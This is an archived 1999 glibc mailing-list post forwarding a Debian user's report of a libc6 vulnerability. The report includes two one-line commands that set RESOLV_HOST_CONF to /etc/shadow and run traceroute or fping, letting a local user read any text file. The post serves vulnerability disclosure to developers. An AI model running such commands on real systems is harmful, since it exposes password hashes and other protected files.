This is the mail archive of the
libc-hacker@cygnus.com
mailing list for the glibc project.
Fwd: libc6 vulnerability
- To: libc-hacker@cygnus.com
- Subject: Fwd: libc6 vulnerability
- From: Joel Klecker <jk@espy.org>
- Date: Sun, 7 Feb 1999 22:07:16 -0800
This was posted to one of the Debian lists, I tested it with glibc
2.1 on my i386 system, and it is also vulnerable.
--- begin forwarded text
Envelope-to: jk@espy.org
Resent-Date: 8 Feb 1999 03:43:02 -0000
Resent-Cc: recipient list not shown: ;
From: vojta@math.berkeley.edu (Paul Vojta)
Date: Sun, 7 Feb 1999 19:42:56 -0800
To: debian-sparc@lists.debian.org
Subject: libc6 vulnerability
Resent-From: debian-sparc@lists.debian.org
X-Mailing-List: <debian-sparc@lists.debian.org> archive/latest/1279
X-Loop: debian-sparc@lists.debian.org
Resent-Sender: debian-sparc-request@lists.debian.org
Status:
Folks:
When checking the security of my system, I found that it is vulnerable
to the following standard attack (in tcsh syntax):
env RESOLV_HOST_CONF=/etc/shadow /usr/sbin/traceroute foobar
or env RESOLV_HOST_CONF=/etc/shadow fping foobar
This allows the user to read any (text) file on the system. My system
has:
netstd 3.07-7.1
libc6 2.0.105-1.2
In other words, it is up to date according to ftp.debian.org.
Curiously, my older 486 system at home is not vulnerable to these attacks.
--Paul Vojta, vojta@math.berkeley.edu
--
To UNSUBSCRIBE, email to debian-sparc-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
--- end forwarded text
--
Joel Klecker (aka Espy) <URL:http://web.espy.org/>
<URL:mailto:jk@espy.org> <URL:mailto:espy@debian.org>
Debian GNU/Linux PowerPC -- <URL:http://www.debian.org/ports/powerpc/>